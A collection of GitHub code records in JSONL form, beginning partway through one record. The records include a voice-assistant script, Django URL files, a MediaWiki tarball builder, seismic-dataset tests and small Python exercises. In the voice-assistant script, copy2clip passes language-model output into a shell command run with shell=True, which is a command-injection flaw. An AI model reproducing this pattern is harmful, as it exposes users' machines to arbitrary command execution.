AudioSegment.from_file('generated_message.mp3',format='mp3')\n \n play(audio_file)\n \n\n \n else:\n print('Failed to generate message using OpenAI GPT-3.5 API.')\n print(\"Listening for wake word 
\nimport subprocess\n\n\ndef copy2clip(txt):\n    # Copy text to the Windows clipboard via the 'clip' utility\n    cmd = 'echo ' + txt.strip() + '|clip'\n    return subprocess.check_call(cmd, shell=True)\n\n\ncobra = pvcobra.create(access_key=PICOVOICEKEY)\n\nopenai.api_key = aikey\nvoice_file = \"voice.wav\"\nfilename = voice_file\nchunk = 1024\nFORMAT = pyaudio.paInt16\nchannels = 1\nsample_rate = 44100\np = pyaudio.PyAudio()\nstream = p.open(format=FORMAT,\n                channels=channels,\n                rate=sample_rate,\n                input=True,\n                output=True,\n                frames_per_buffer=chunk)\nframes = []\n\nporcupine = pvporcupine.create(\n    access_key=PICOVOICEKEY, keyword_paths=['Hey-Friday_en_windows_v2_2_0.ppn'],\n    keywords=['Hey Jarvis']\n)\n\nr = sr.Recognizer()\n\nwake_word = 'hey assistant'\npa = pyaudio.PyAudio()\naudio_stream = pa.open(\n    rate=porcupine.sample_rate,\n    channels=1,\n    format=pyaudio.paInt16,\n    input=True,\n    frames_per_buffer=porcupine.frame_length)\n\nprint(\"Listening for wake word ('{}')...\".format(wake_word))\n\nwhile True:\n    pcm = audio_stream.read(porcupine.frame_length)\n    pcm = struct.unpack_from(\"h\" * porcupine.frame_length, pcm)\n\n    keyword_index = porcupine.process(pcm)\n    if keyword_index >= 0:\n        stream.start_stream()\n        frames = []  # fresh recording buffer for this utterance\n        prompt = None\n\n        start_time = time.time()\n\n        while True:\n            pcm = audio_stream.read(cobra.frame_length)\n            pcm = struct.unpack_from(\"h\" * cobra.frame_length, pcm)\n            voice_probability = cobra.process(pcm)\n\n            data = stream.read(chunk)\n            frames.append(data)\n\n            if voice_probability > 0.2:\n                # Voice activity: keep recording and restart the silence timer\n                # (the original reset the timer on silent frames, so the\n                # two-second cutoff could never be reached)\n                start_time = time.time()\n            elif time.time() - start_time >= 2.0:\n                # Roughly two seconds of silence: stop recording and transcribe\n                stream.stop_stream()\n\n                wf = wave.open(filename, \"wb\")\n                wf.setnchannels(channels)\n                wf.setsampwidth(p.get_sample_size(FORMAT))\n                wf.setframerate(sample_rate)\n                wf.writeframes(b\"\".join(frames))\n                wf.close()\n\n                transcript = None\n                with sr.AudioFile(filename) as source:\n                    try:\n                        transcript = r.recognize_google(r.record(source), None, \"en-US\", 0, False)\n                    except (sr.UnknownValueError, sr.RequestError):\n                        pass\n                print(transcript)\n\n                if not isinstance(transcript, str):\n                    transcript = ' say \"sorry i didnt get that\"'\n\n                os.remove('voice.wav')\n                prompt = 'your name will be Friday and your job is an AI Voice Assistant, here is your text, ' + transcript\n\n                break\n\n        response = openai.Completion.create(\n            model=\"text-davinci-003\", prompt=prompt, temperature=0, n=1)\n        if 'choices' in response and len(response['choices']) > 0:\n            message = response['choices'][0]['text']\n            copy2clip(message)\n\n            tts = gTTS(text=message, lang='en', tld='co.za')\n            tts.save('generated_message.mp3')\n\n            audio_file = AudioSegment.from_file('generated_message.mp3', format='mp3')\n\n            play(audio_file)\n\n        else:\n            print('Failed to generate message using OpenAI GPT-3.5 API.')\n        print(\"Listening for wake word ('{}')...\".format(wake_word))\n","repo_name":"Coolcreeper221/Friday","sub_path":"Jarvis.py","file_name":"Jarvis.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"38401835526","text":"import logging\nimport copy\nlogger = None\nimport hashlib\n\ndef setup_logger(args):\n global logger\n if logger == None:\n logger = logging.getLogger()\n else: # wish there was a logger.close()\n for handler in logger.handlers[:]: # make a copy of the list\n logger.removeHandler(handler)\n\n args_copy = copy.deepcopy(args)\n # copy to get a clean hash\n # use the same log file hash if iterations or verbose are different\n # these flags do not change the results\n args_copy.iters = 1\n args_copy.verbose = False\n args_copy.log_interval = 1\n args_copy.seed = 0\n\n log_path = './log/{0}_{1}_{2}.log'.format(args.model, args.density, hashlib.md5(str(args_copy).encode('utf-8')).hexdigest()[:8])\n\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(fmt='%(asctime)s: %(message)s', datefmt='%H:%M:%S')\n\n fh = logging.FileHandler(log_path)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\ndef print_and_log(msg):\n global logger\n print(msg)\n logger.info(msg)\n","repo_name":"JiePKU/MIA-SafeCompress","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"13763232363","text":"from django.urls import path \nfrom . import views\n\napp_name = 'firstapp' #appの名前空間を表す(画面の遷移を指定する場合に用いる)\nurlpatterns={\n path('index/',views.index,name='index'),#/helloでアクセスした場合にviewsファイル内のindex関数を表す\n path('page/',views.user_page,name='user_page'),\n path('number_page//',views.number_page, name = 'number_page'),\n path('home',views.home, name = 'home')\n}","repo_name":"FatherPower/DjangoPractice","sub_path":"firstapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21444449433","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^demo/ajax', views.ajax),\n url(r'^demo/commands/?$', views.test_commands),\n url(r'^demo/services/?$', views.test_services),\n url(r'^demo/pushkin/?$', views.test_pushkin),\n\n url(r'^grep/voip/tau-8/?$', views.grep_voip_config),\n url(r'^ping/(?P[0-9\\.]+)/$', views.ping),\n\n url(r'^disable/interface/?$', views.disable_interface),\n url(r'^enable/interface/?$', views.enable_interface),\n url(r'^ports/status/?$', views.ports_status),\n\n url(r'^$', views.index),\n]\n\n\n\n","repo_name":"ilique/webpushkin","sub_path":"pushkin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33966552769","text":"import re\nfrom itertools import chain\n\nfrom typing import List, Union, Iterable, Generator, Optional, Callable\n\n# ---------- Custom typing ----------\nElementsType = List[Union[int, str]]\n\n\ndef serial_no_generator(lower: int = 0, upper: int = 10, reused: bool = True, values: Iterable[int] = None) -> \\\n Generator[int, None, None]:\n values = values or []\n eset = set(filter(lambda x: lower <= x < upper, values))\n if eset:\n max_val = max(eset)\n if reused:\n gen = chain(range(max_val + 1, upper), range(lower, max_val))\n else:\n gen = range(max_val + 1, upper)\n else:\n gen = range(lower, upper)\n for ele in gen:\n if ele in eset:\n continue\n yield ele\n\n\n_fmt_re = re.compile(r'\\{no(:0(\\d+)([bodxX]))?\\}')\n\nb2p_dict = {'b': 2, 'o': 8, 'd': 10, 'x': 16, 'X': 16}\np2b_dict = {2: 'b', 8: 'o', 10: 'd', 16: 'x'}\n\n\nclass LabelFormatOpts:\n def __init__(self, fmt_str, base=10, digits=2):\n\n base_char = p2b_dict[base]\n data = _fmt_re.findall(fmt_str)\n ft = [item[0] for item in data if item[0] != '']\n if ft:\n if all(el == ft[0] for el in ft):\n base_char = ft[0][-1]\n base, digits = b2p_dict.get(base_char), int(ft[0][2:-1])\n else:\n raise ValueError(f'{fmt_str} Define different formatter for no variable.')\n new_field_fmt = '{{no:0{0}{1}}}'.format(digits, base_char)\n\n self.origin_fmt = fmt_str\n self.normalized_fmt = _fmt_re.sub(new_field_fmt, fmt_str)\n\n fr_dict = {\n 'b': '(?P[01]{{{0}}})'.format(digits),\n 'o': '(?P[0-7]{{{0}}})'.format(digits),\n 'd': '(?P[0-9]{{{0}}})'.format(digits),\n 'x': '(?P[0-9a-f]{{{0}}})'.format(digits),\n 'X': '(?P[0-9A-Z]{{{0}}})'.format(digits),\n }\n\n self.parse_re = re.compile(self.normalized_fmt.replace(new_field_fmt, fr_dict[base_char]))\n self.base = base\n self.digits = digits\n self.base_char = base_char\n\n def value2label(self, value: int) -> str:\n return self.normalized_fmt.format(no=value)\n\n def label2value(self, label: str) -> int:\n m = self.parse_re.match(label)\n if m:\n return int(m.group('no'), base=self.base)\n raise ValueError(f'Error Value {label}')\n\n\nclass SerialElement:\n __slots__ = ['value', 'label']\n\n def __init__(self, value, label):\n self.value = value\n self.label = label\n\n\nclass SerialNoPool:\n def __init__(self, lower: int = None, upper: int = None, base: int = 0, digits: int = 0,\n label_fmt: Optional[str] = None):\n\n if label_fmt is None:\n self._opts = None\n else:\n base = base or 10\n digits = digits or 2\n self._opts = LabelFormatOpts(label_fmt, base, digits)\n base = self._opts.base\n digits = self._opts.digits\n\n if lower is not None and lower < 0:\n raise ValueError(f'lower(={lower}) must be >= 0.')\n if upper is not None and upper <= 0:\n raise ValueError(f'upper(={upper}) must be >= 0.')\n s_set = base and digits\n t_set = lower is not None and upper is not None\n\n if t_set:\n self._lower, self._upper = lower, upper\n if s_set:\n cl, cu = 0, base ** digits\n if not (lower >= cl and upper <= cu):\n raise ValueError(f'The lower-upper [{lower},{upper}) is not in [{cl},{cu})')\n else:\n if s_set:\n self._lower, self._upper = 0, base ** digits\n else:\n self._lower, self._upper = 0, 100\n\n self._values = set()\n self._source = None\n\n # ---------- Pool Attributes ----------\n\n @property\n def lower(self):\n return self._lower\n\n @property\n def upper(self):\n return self._upper\n\n # ---------- Data API ----------\n\n def set_elements(self, elements: ElementsType) -> 'SerialNoPool':\n self._values = set()\n self.add_elements(elements)\n return 
self\n\n def set_source(self, source: Callable[[], ElementsType]) -> 'SerialNoPool':\n self._source = source\n return self\n\n def add_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.add(v)\n return self\n\n def remove_elements(self, elements: ElementsType) -> 'SerialNoPool':\n values = self._elements2values(elements)\n for v in values:\n self._values.remove(v)\n return self\n\n def _elements2values(self, elements: ElementsType) -> List[int]:\n values = [] # type: List[int]\n for ele in elements:\n if isinstance(ele, int):\n value = ele\n elif isinstance(ele, str):\n value = self._opts.label2value(ele)\n else:\n raise TypeError(f'Invalid element {ele}:unsupported type.')\n if self._lower <= value < self._upper:\n values.append(value)\n else:\n raise ValueError(f'Invalid element {ele}: range error')\n return values\n\n # ---------- Generate API ----------\n\n def get_next_generator(self) -> Generator[SerialElement, None, None]:\n \"\"\"\n This is the low-level method.\n :return:\n \"\"\"\n if self._source is not None:\n elements = self._source()\n self.set_elements(elements)\n value_gen = serial_no_generator(lower=self._lower, upper=self._upper, values=self._values)\n for value in value_gen:\n if self._opts:\n label = self._opts.value2label(value)\n else:\n label = None\n yield SerialElement(value, label)\n\n def generate_values(self, num=1) -> List[int]:\n return [se.value for se in self.get_next_generator()][:num]\n\n def generate_labels(self, num=1) -> List[str]:\n if self._opts is None:\n raise TypeError('The operation generate_labels is not allowed when label_fmt is not set.')\n return [se.label for se in self.get_next_generator()][:num]\n\n def generate(self, num=1) -> List[str]:\n return self.generate_labels(num)\n","repo_name":"kinegratii/borax","sub_path":"borax/counters/serial_pool.py","file_name":"serial_pool.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"32"}
+{"seq_id":"35720542878","text":"#!/usr/bin/env python3\n\"\"\"\nnightly.py - tarball creator\n\nThis is a script that creates tarballs\nfor MediaWiki extensions based on the\nconfiguration in conf.py. It accepts\nsome optional arguments:\n\n* --all: Generate tarballs for all extensions.\n* --skins: Process skins instead of extensions\n* --force: Regenerate all tarballs even if they already exist\n\nBy default, it generates only the tarball for the\nVisualEditor extension (or the Vector skin if\n--skins is passed). This will change in the future\nwhen debugging becomes less rare.\n\"\"\"\n\nimport glob\nimport json\nimport logging\nimport os\nimport random\nimport requests\nimport subprocess\nimport sys\nimport traceback\n\n\nclass TarballGenerator(object):\n def __init__(self, conf, repo_type='extensions', force=False):\n self.API_URL = conf['API_URL']\n self.DIST_PATH = conf['DIST_PATH']\n self.GIT_URL = conf['GIT_URL']\n self.LOG_FILE = conf['LOG_FILE']\n self.SRC_PATH = conf['SRC_PATH']\n self.PID_FILE = conf['PID_FILE']\n self.LOG_FILE = conf['LOG_FILE']\n self.REPO_TYPE = repo_type\n self.EXT_PATH = os.path.join(self.SRC_PATH, self.REPO_TYPE)\n self.COMPOSER = conf.get('COMPOSER')\n self._repo_list = None\n self._extension_config = None\n self.force = force\n self.session = requests.Session()\n\n @property\n def repo_list(self):\n \"\"\"\n Lazy-load the list of all extensions\n \"\"\"\n if self._repo_list is None:\n self._repo_list = self.fetch_all_repos()\n return self._repo_list\n\n def fetch_all_repos(self):\n \"\"\"\n Does an API request to get the complete list of extensions.\n Do not call directly.\n \"\"\"\n logging.debug('Fetching list of all %s...' % self.REPO_TYPE)\n data = {\n 'action': 'query',\n 'list': 'extdistrepos',\n 'format': 'json'\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n return r.json()['query']['extdistrepos'][self.REPO_TYPE]\n\n @property\n def supported_versions(self):\n \"\"\"\n Lazy-load the list of supported branches\n \"\"\"\n if self._extension_config is None:\n self.fetch_extension_config()\n return self._extension_config['snapshots']\n\n def fetch_extension_config(self):\n \"\"\"\n Fetch the ExtensionDistributor configuration from the API\n Do not call this directly.\n \"\"\"\n logging.debug('Fetching ExtensionDistributor config from API...')\n data = {\n 'action': 'query',\n 'meta': 'siteinfo',\n 'format': 'json',\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n resp = r.json()\n self._extension_config = resp['query']['general']['extensiondistributor']\n\n return {\n 'versions': resp['query']['general']['extensiondistributor']['snapshots'],\n 'extension-list': resp['query']['general']['extensiondistributor']['list']\n }\n\n def init(self):\n \"\"\"\n Does basic initialization\n \"\"\"\n # Set up logging\n logging.basicConfig(\n filename=self.LOG_FILE,\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s:%(message)s'\n )\n\n # Check to make sure nightly.py isn't already running\n if os.path.exists(self.PID_FILE):\n with open(self.PID_FILE, 'r') as f:\n old_pid = f.read()\n\n if self.check_pid(int(old_pid)):\n logging.warning('Another process of nightly.py is still running, quitting this one')\n quit()\n\n self.create_pid_file()\n\n # Init some directories we'll need\n if not os.path.isdir(self.EXT_PATH):\n self.shell_exec(['mkdir', '-p', self.EXT_PATH])\n if not os.path.isdir(self.DIST_PATH):\n self.shell_exec(['mkdir', '-p', self.DIST_PATH])\n\n def shell_exec(self, args, 
**kwargs):\n \"\"\"\n Shortcut wrapper to execute a shell command\n\n >>> self.shell_exec(['ls', '-l'])\n \"\"\"\n return subprocess.check_output(args, **kwargs).decode()\n\n def update_extension(self, ext):\n \"\"\"\n Fetch an extension's updates, and\n create new tarballs if needed\n \"\"\"\n full_path = os.path.join(self.EXT_PATH, ext)\n logging.info('Starting update for %s' % ext)\n repo_url = self.GIT_URL % ext\n if not os.path.exists(full_path):\n os.chdir(self.EXT_PATH)\n logging.debug('Cloning %s' % ext)\n self.shell_exec(['git', 'clone', repo_url, ext])\n pass\n for branch in self.supported_versions:\n os.chdir(full_path)\n logging.info('Creating %s for %s' % (branch, ext))\n # In case GIT_URL has changed\n self.shell_exec(['git', 'remote', 'set-url', 'origin', repo_url])\n # Update remotes\n self.shell_exec(['git', 'fetch'])\n try:\n # Could fail if repo is empty\n self.shell_exec(['git', 'reset', '--hard', 'origin/master'])\n # Reset everything!\n self.shell_exec(['git', 'clean', '-ffdx'])\n # Checkout the branch\n self.shell_exec(['git', 'checkout', 'origin/%s' % branch])\n except subprocess.CalledProcessError:\n # Just a warning because this is expected for some extensions\n logging.warning('could not checkout origin/%s' % branch)\n continue\n # Reset everything, again.\n self.shell_exec(['git', 'clean', '-ffd'])\n # Sync submodules in case their urls have changed\n self.shell_exec(['git', 'submodule', 'sync'])\n # Update them, initializing new ones if needed\n self.shell_exec(['git', 'submodule', 'update', '--init'])\n # Gets short hash of HEAD\n rev = self.shell_exec(['git', 'rev-parse', '--short=7', 'HEAD']).strip()\n tarball_fname = '%s-%s-%s.tar.gz' % (ext, branch, rev)\n if not self.force and os.path.exists(os.path.join(self.DIST_PATH, tarball_fname)):\n logging.debug('No updates to branch, tarball already exists.')\n continue\n if self.COMPOSER and os.path.exists('composer.json'):\n with open('composer.json') as f_composer:\n d_composer = json.load(f_composer)\n if 'require' in d_composer:\n logging.debug('Running composer install for %s' % ext)\n try:\n self.shell_exec([self.COMPOSER, 'install', '--no-dev', '--ignore-platform-reqs'])\n except subprocess.CalledProcessError:\n logging.error(traceback.format_exc())\n logging.error('composer install failed')\n # Create gitinfo.json to be read/displayed by Special:Version\n git_info = {}\n with open('.git/HEAD') as f_head:\n head = f_head.read()\n if head.startswith('ref:'):\n head = head[5:] # Strip 'ref :'\n git_info['head'] = head\n # Get the SHA-1\n git_info['headSHA1'] = self.shell_exec(['git', 'rev-parse', 'HEAD'])\n git_info['headCommitDate'] = self.shell_exec(['git', 'show', '-s', '--format=format:%ct', 'HEAD'])\n if head.startswith('refs/heads'):\n gi_branch = head.split('/')[-1]\n else:\n gi_branch = head\n git_info['branch'] = gi_branch\n git_info['remoteURL'] = self.GIT_URL % ext\n with open('gitinfo.json', 'w') as f:\n json.dump(git_info, f)\n\n # TODO: Stop writing this file now that we have gitinfo.json\n # Create a 'version' file with basic info about the tarball\n with open('version', 'w') as f:\n f.write('%s: %s\\n' % (ext, branch))\n f.write(self.shell_exec(['date', '+%Y-%m-%dT%H:%M:%S']) + '\\n') # TODO: Do this in python\n f.write(rev + '\\n')\n old_tarballs = glob.glob(os.path.join(self.DIST_PATH, '%s-%s-*.tar.gz' % (ext, branch)))\n logging.debug('Deleting old tarballs...')\n for old in old_tarballs:\n # FIXME: Race condition, we should probably do this later on...\n os.unlink(old)\n 
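# note that the old tarballs are removed before the new one is written, so a\n            # failure between the two steps leaves this branch without any tarball until the next run\n            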
os.chdir(self.EXT_PATH)\n # Finally, create the new tarball\n self.shell_exec(['tar', '--exclude', '.git', '-czhPf', tarball_fname, ext])\n logging.debug('Moving new tarballs into dist/')\n tarballs = glob.glob(os.path.join(self.EXT_PATH, '*.tar.gz'))\n for tar in tarballs:\n fname = tar.split('/')[-1]\n os.rename(tar, os.path.join(self.DIST_PATH, fname))\n logging.info('Finished update for %s' % ext)\n\n if random.randint(0, 99) == 0:\n # Run git gc every 100th process (statistically)\n self.shell_exec(['git', 'gc'], cwd=full_path)\n\n def check_pid(self, pid):\n \"\"\"\n Checks whether the given pid is running\n \"\"\"\n try:\n # This doesn't actually kill it, just checks if it is running\n os.kill(pid, 0)\n except OSError:\n # Not running\n return False\n else:\n # So it must be running\n return True\n\n def create_pid_file(self):\n \"\"\"\n Creates a pid file with the current pid\n \"\"\"\n with open(self.PID_FILE, 'w') as f:\n f.write(str(os.getpid()))\n logging.info('Creating pid file')\n\n def run(self, repos=None):\n self.init()\n if not repos:\n repos = self.repo_list\n logging.info('Processing %s %s' % (len(repos), self.REPO_TYPE))\n logging.info('Starting update of all %s...' % self.REPO_TYPE)\n for repo in repos:\n try:\n self.update_extension(repo)\n except KeyboardInterrupt:\n logging.error(traceback.format_exc())\n sys.exit(1)\n except Exception:\n logging.error(traceback.format_exc())\n logging.error('Updating %s failed, skipping' % repo)\n logging.info('Finished update of all %s!' % self.REPO_TYPE)\n\n\ndef main():\n # Load our config from JSON\n conf = None\n skins = '--skins' in sys.argv\n etc_path = '/etc/skindist.conf' if skins else '/etc/extdist.conf'\n local_fname = 'skinconf.json' if skins else 'conf.json'\n if os.path.exists(etc_path):\n with open(etc_path, 'r') as f:\n conf = json.load(f)\n elif os.path.exists(os.path.join(os.path.dirname(__file__), local_fname)):\n with open(os.path.join(os.path.dirname(__file__), local_fname), 'r') as f:\n conf = json.load(f)\n else:\n print('extdist is not configured properly.')\n quit()\n if '--all' in sys.argv:\n repos = []\n elif skins:\n repos = ['Vector']\n else:\n repos = ['VisualEditor']\n for arg in sys.argv:\n if arg.startswith('--repo'):\n repos.append(arg.split('=', 1)[1])\n repo_type = 'skins' if skins else 'extensions'\n force = '--force' in sys.argv\n generator = TarballGenerator(conf, repo_type=repo_type, force=force)\n generator.run(repos=repos)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wikimedia/labs-tools-extdist","sub_path":"nightly.py","file_name":"nightly.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"43285861310","text":"import time\n\nimport numpy as np\nfrom constants import LEVEL2, ACTIONS, GameStatus\nfrom Level import Level\nfrom WYB import WatchYourBack\nfrom map_utilities import clear_console_output, encode_map_numeric, print_map\nfrom dql import DQNAgent\n\ngame = WatchYourBack(Level(LEVEL2))\nstate_size = len(LEVEL2)**2\nagent = DQNAgent(state_size, 4)\nagent.epsilon = 0\nagent.load(\"./save/level2.h5\")\n\nclear_console_output()\nprint_map(game.level.level)\ntime.sleep(2)\n\nwhile game.status == GameStatus.ONGOING:\n state = encode_map_numeric(game.level.level)\n player_move = agent.act(np.reshape(state, [1, state_size]))\n\n game.move_player(ACTIONS[player_move])\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\n game.move_enemies()\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\nprint('Result:', game.status)","repo_name":"yortuc/backGame","sub_path":"trainer/dql_play.py","file_name":"dql_play.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"5303542727","text":"import numpy as np\n\nimport pytest\n\nfrom hypothesis import given, assume, settings\nfrom hypothesis.strategies import integers, text, floats, tuples, sampled_from\nfrom hypothesis.extra.numpy import arrays\n\nfrom segysak._seismic_dataset import (\n _check_vert_units,\n _check_input,\n _dataset_coordinate_helper,\n)\nfrom segysak._seismic_dataset import (\n create_seismic_dataset,\n create2d_dataset,\n create3d_dataset,\n)\n\nfrom segysak._keyfield import VerticalUnits, VerticalKeyField\n\n\nclass TestCheckers:\n \"\"\"\n Test data checking utilities\n \"\"\"\n\n def test_check_input_does_nothing_to_None(self):\n assert _check_input(None) is None\n\n @given(integers(0, 100000))\n def test_check_input_turns_int_into_array(self, i):\n assert len(_check_input(i)) == i\n\n def test_check_input_converts_to_array(self):\n assert isinstance(_check_input([0, 0]), np.ndarray)\n\n def test_check_input_raises_error_at_multidimensions(self):\n with pytest.raises(ValueError):\n _check_input([[0, 0]])\n\n @pytest.mark.parametrize(\"u\", list(VerticalUnits))\n def test_vertical_units_pass_checking(self, u):\n assert _check_vert_units(u) == u\n\n @given(text())\n def test_illegal_vertical_units_raise_errors(self, t):\n assume(t not in list(VerticalUnits))\n with pytest.raises(ValueError):\n _check_vert_units(t)\n\n @pytest.mark.parametrize(\"p\", list(VerticalKeyField.values()))\n def test_domains_pass_checking(self, p):\n _, domain = _dataset_coordinate_helper(None, p)\n assert p == domain\n\n @given(text())\n def test_illegal_domain_raise_errors(self, t):\n assume(t not in list(VerticalKeyField.values()))\n with pytest.raises(ValueError):\n _dataset_coordinate_helper(None, t)\n\n\nclass TestCreateSeismicDataset:\n \"\"\"\n Test creating a seismic dataset with various dimensions and sizes\n \"\"\"\n\n @given(integers(0, 10000), integers(0, 100000))\n def test_create_2D_seismic_dataset_with_integers(self, s, t):\n dataset = create_seismic_dataset(\n twt=s, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == s\n\n @given(integers(0, 45))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_offsets(self, o):\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=o\n )\n assert len(dataset.dims) == 3\n\n @given(integers(0, 10000), integers(0, 100000), integers(0, 100000))\n def test_create_3D_seismic_dataset_with_integers(self, s, i, x):\n dataset = create_seismic_dataset(\n twt=None, depth=s, cdp=None, iline=i, xline=x, offset=None\n )\n assert len(dataset.dims) == 3\n assert dataset.dims[\"depth\"] == s\n\n @given(\n arrays(float, shape=integers(0, 10000), elements=floats(-1000, 1000)),\n integers(0, 10000),\n )\n def test_create_2D_seismic_dataset_with_arrays(self, a, t):\n dataset = create_seismic_dataset(\n twt=a, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == len(a)\n\n @given(integers(0, 100))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_multiple_dimensions(self, d):\n dims = {str(i): i for i in range(d)}\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=None, **dims\n )\n assert len(dataset.dims) == d + 2\n\n def test_mutally_not_allowed_arguments(self):\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100, xline=100)\n\n with 
pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, xline=100)\n\n def test_mutually_required_arguments(self):\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(xline=100)\n\n\nclass TestCreate2DDataset:\n \"\"\"\n Test creating 2D datasets with various shapes\n \"\"\"\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100))\n def test_create_2D_dataset_custom_sampling(self, s, f, r):\n dataset = create2d_dataset(\n dims=(100, s), first_sample=f, sample_rate=r, vert_domain=\"TWT\"\n )\n assert dataset.twt.data.max() == f + s * r - r\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100))\n def test_create_2D_dataset_custom_cdp(self, t, f, s):\n dataset = create2d_dataset(dims=(t, 100), first_cdp=f, cdp_step=s)\n assert dataset.cdp.data.max() == f + s * t - s\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100), integers(0, 50))\n def test_create_2D_dataset_wfirstoffset(self, s, f, r, o):\n dataset = create2d_dataset(\n dims=(100, s, 5),\n first_cdp=f,\n cdp_step=s,\n sample_rate=r,\n first_offset=o,\n offset_step=10,\n )\n assert dataset.offset.data.max() == 4 * 10 + o\n\n\nclass TestCreate3DDataset:\n \"\"\"\n Test creating 3D datasets with various shapes\n \"\"\"\n\n @given(\n tuples(integers(1, 10000), integers(1, 10000), integers(0, 1000)),\n sampled_from(list(VerticalUnits)),\n )\n def test_create_full_stack_dataset(self, d, u):\n dataset = create3d_dataset(dims=d, vert_units=u)\n assert dataset.d3_domain == \"TWT\"\n assert dataset.measurement_system == u\n\n @given(\n integers(15, 60),\n floats(0, 15),\n floats(1, 15),\n sampled_from([\"TWT\", \"twt\", \"DEPTH\", \"depth\"]),\n )\n def test_create_angle_stack_dataset(self, o, f, s, d):\n dataset = create3d_dataset(\n (1000, 1000, 100, o), first_offset=f, offset_step=s, vert_domain=d\n )\n assert dataset.d3_domain == d.upper()\n assert len(dataset.dims) == 4\n","repo_name":"trhallam/segysak","sub_path":"tests/test_seismic_dataset.py","file_name":"test_seismic_dataset.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"32"}
+{"seq_id":"3526773695","text":"def findReciprocal(Value):\r\n try:\r\n print(\"Value:-\", Value)\r\n r =1/Value\r\n print(\"The reciprocl of\",Value,\"is\",r,\"\\n\")\r\n\r\n except:\r\n print(\"you cannt find reciprocal of \",Value,\"\\n\")\r\n\r\n\r\nfindReciprocal(\"hello\")\r\nfindReciprocal(2)","repo_name":"Abhishek6625/python","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"31942370719","text":"# 获取列表的一些基本信息\n\nlist1 = [9, 1, -4, 3, 7, 11, 3]\n\n#print('list1 =', len(list1))\n#print('list1.Max=', max(list1))\n#print('list1.Min=', min(list1))\n# print('list1.3={}'.format(list1.count(3)))\n\n# append 结尾插入\n# insert 中间插入\n# remove 删除\n# reverse 翻转\n# sort 排序 (不改为正序,reverse为倒序)\n\n\n# 列表的改变\n\nlist2 = ['a', 'c', 'd']\n\n# 给list2结尾添加一个新元素 'e'\nlist2.append('e')\n#print('list2=', list2)\n\n\n# 在list2的'a'和'c'之间插入一个 'b'\nlist2.insert(1, 'b')\n#print('list2=', list2)\n\n# 删除list2里的'b'\nlist2.remove('b')\n#print('list2=', list2)\n\n\n# 更改元素\nlist2[0] = '1'\n#print('list2=', list2)\n\n\n#a = '123'\n#a[0] = 'a'\n#a = 'abc'\n\n\n# 列表翻转\nlist3 = [1, 2, 3]\nlist3.reverse()\n#print('list3=', list3)\n\n\n# 列表排序\n\nlist4 = [9, 1, -4, 3, 7, 11, 3]\nlist4.sort(reverse=True)\n#print('list4=', list4)\n\n\nlist5 = [1, 'a', 3, [1, 2], 'c']\n\n# print(max(list5))\nprint(format(list5.count(1)))\nlist5.append('b')\nlist5.insert(1, 2)\nlist5.remove('b')\nlist5[2] = 3\nlist5[3] = 4\n\nlist5.reverse() # 先排字符串>列表>整数\n# list5.sort(reverse=True) 无法倒序\nprint(list5)\n","repo_name":"op5280546/Python-Test","sub_path":"列表和元組/list_methods.py","file_name":"list_methods.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
